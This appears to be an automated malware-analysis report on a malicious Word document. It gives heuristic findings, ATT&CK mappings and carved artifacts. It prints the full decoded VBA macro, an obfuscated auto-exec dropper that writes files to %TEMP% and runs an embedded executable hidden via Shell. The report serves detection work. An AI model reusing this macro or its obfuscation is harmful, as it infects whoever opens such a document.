MALICIOUS
674
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1203 Exploitation for Client Execution
The sample is a malicious Microsoft Word document that leverages VBA macros to execute a dropped PE file. The VBA code contains obfuscated strings and calls to `CreateObject` and `Shell` functions, indicating an attempt to download and execute a second-stage payload. The embedded executable, `embedded_office_00006250.exe`, is detected by ClamAV as potentially malicious. The macro also attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy.
Heuristics 18
-
CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
-
ClamAV: Doc.Macro.ObfuscatedChr-6203136-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedChr-6203136-0
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Dim ite As Variant ite = Shell(hfye, 0) End Function -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set hfuBdgaVvw = CreateObject(FtqwVswq(23 + 64) & "ord.Application") hfuBdgaVvw.Visible = bhgw -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set hfuBdgaVvw = CreateObject(FtqwVswq(23 + 64) & "ord.Application") hfuBdgaVvw.Visible = bhgw -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Sub Sub AutoOpen() VYUQWD = "wkjd qwjdhkqwhjkqwg" -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
End Function Sub Workbook_Open() Yhbbgdgyw -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
End Function Sub Auto_Open() Yhbbgdgyw -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
TYYYWE = "T" & TYYYWE + "P" LLKKMN = Environ(TYYYWE) + YGBASDW RTQCDW = FtqwVswq(41 + 5) -
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 208,898 bytes but its declared streams total only 42,881 bytes — 166,017 bytes (79%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2904 bytes |
SHA-256: 683c9ced10529e8df240791cd93bd1a65a349df907fb0da247d839e372580d67 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
67 of 111 identifiers look randomly generated (e.g. 'kqwqwdqwdjkqlkqwd') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Bgywqewq()
Yhbbgdgyw
End Sub
Sub Yhbbgdgyw()
Dim fdaa As Integer
Dim bhgw As Boolean, FDFWQD As String
bhgw = False
DFWCQDW = DatePart("yyyy", "11/10/7134")
DFWCQDW = Left(DFWCQDW, 1)
TYYYWE = "EM"
fdaa = CInt(DFWCQDW) - 8
On Error Resume Next
YGBASDW = Left("\wjh83\", 1)
TYYYWE = "T" & TYYYWE + "P"
LLKKMN = Environ(TYYYWE) + YGBASDW
RTQCDW = FtqwVswq(41 + 5)
RREW = RTQCDW + FtqwVswq(6 + 96 + fdaa)
RREW = RREW & "x" + FtqwVswq(10 + 91)
UUIIW = RTQCDW & FtqwVswq(-6 + 120) & FtqwVswq(5 + 110 + 1) + "f"
BBBVQWGD = LLKKMN + "fuewq" + UUIIW
DDDHUQWD = LLKKMN + "fbywuq" + UUIIW
FDFWQD = LLKKMN + "idd2" & RREW
VgfdVsq (BBBVQWGD)
VgfdVsq (DDDHUQWD)
Module1.Findat (2)
QWJDQ = LLKKMN + "fuewq" & ".rtf"
HYUQWD = "lkf lwkejflkhqjkwdq"
Set hfuBdgaVvw = CreateObject(FtqwVswq(23 + 64) & "ord.Application")
hfuBdgaVvw.Visible = bhgw
JUHFEW = "kqwdjqwkqlkqwd"
JBDASDS = "kqwqwddjkqlkqwd"
LQKWDHAS = "kqwasddjkqlkqwd"
VBHMQWD = "kqwqwdjkqlkqwd"
BCHJASD = "kqwdjqwdkqlkqwd"
UQWDGJHSBD = "kqwdqwjkqlkqwd"
KASJDLQW = "kqwdjkasdqlkqwd"
BHQJSDQ = "kqwdjkasdqlkqwd"
JQIWDHUQW = "kqwdjqww2kqlkqwd"
hfuBdgaVvw.Documents.Open (QWJDQ)
CBHJQHDBA = "kqd3rwdjkqlkqwd"
JQWBDWQ = "kqwdjkqsadlkqwd"
QUHDQBW = "kqwdj32dsakqlkqwd"
QJWDBKQW = "kqwd3fjkqlkqwd"
QBHFJB = "kqwdjkql3d1kqwd"
NQHJWBQ = "kqwdjkqlasdakqwd"
QBHJWQD = "kqwdjkqlqwd12kqwd"
QBHDWJWQ = "kqwdjkqqwlkqwd"
BHQVJQW = "kqwdjkqlksadqwd"
Module1.Findat (2)
HYUASGD = Module1.Trwnw(FDFWQD)
Module1.Findat (3)
hfuBdgaVvw.Quit
Set hfuBdgaVvw = Nothing
End Sub
Public Function FtqwVswq(ande As Integer)
FtqwVswq = Chr(ande)
End Function
Sub Workbook_Open()
Yhbbgdgyw
End Sub
Sub AutoOpen()
VYUQWD = "wkjd qwjdhkqwhjkqwg"
Bgywqewq
End Sub
Public Function VgfdVsq(fndj As String)
BCJHMA = "kqwdjkqlkqwd"
VBJQK = "kqwdqwdjkqlkqwd"
QWIDHQ = "kqwqwdqwdjkqlkqwd"
ActiveDocument.SaveAs FileName:=fndj, FileFormat:=wdFormatRTF
JUHFEW = "kqwdjkqlkqwd"
QBHJSA = "kqwdasdqwjkqlkqwd"
QJNWKD = "kqwqwddjkqlkqwd"
QIWUHDUWQ = "kqwdjasdkqlkqwd"
CHJBQWD = "kqwdjqwdkqlkqwd"
JBNSADNMBSAN = "kqqwdqwwdjkqlkqwd"
JQHWDKJQW = "kqwdjasdqkqlkqwd"
JBAHJWQ = "kqwdqadsjkqlkqwd"
JQHWBDJQ = "kqwdjkqwdqwqlkqwd"
End Function
Sub Auto_Open()
Yhbbgdgyw
End Sub
Attribute VB_Name = "Module1"
Sub Findat(Torj As Long)
Dim Yuuw As Long
Dim Rtes As Long
NQWJDSD = ";qkwldjq kl"
Rtes = Torj + Timer
Yuuw = Rtes
Do While Timer < Yuuw
DoEvents
Loop
End Sub
Public Function Trwnw(hfye As String)
Dim ite As Variant
ite = Shell(hfye, 0)
End Function
|
|||
embedded_office_00006250.exe |
embedded-pe | Office MZ+PE at offset 0x6250 | 183730 bytes |
SHA-256: 54030c4bd897b550e71b3f7ac6c25aa5c6e4991597f2a20bb3b4b7ff4d148df5 |
|||
|
Detection
ClamAV:
BC.Win.Packer.Troll-14
Obfuscation or payload:
likely
Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.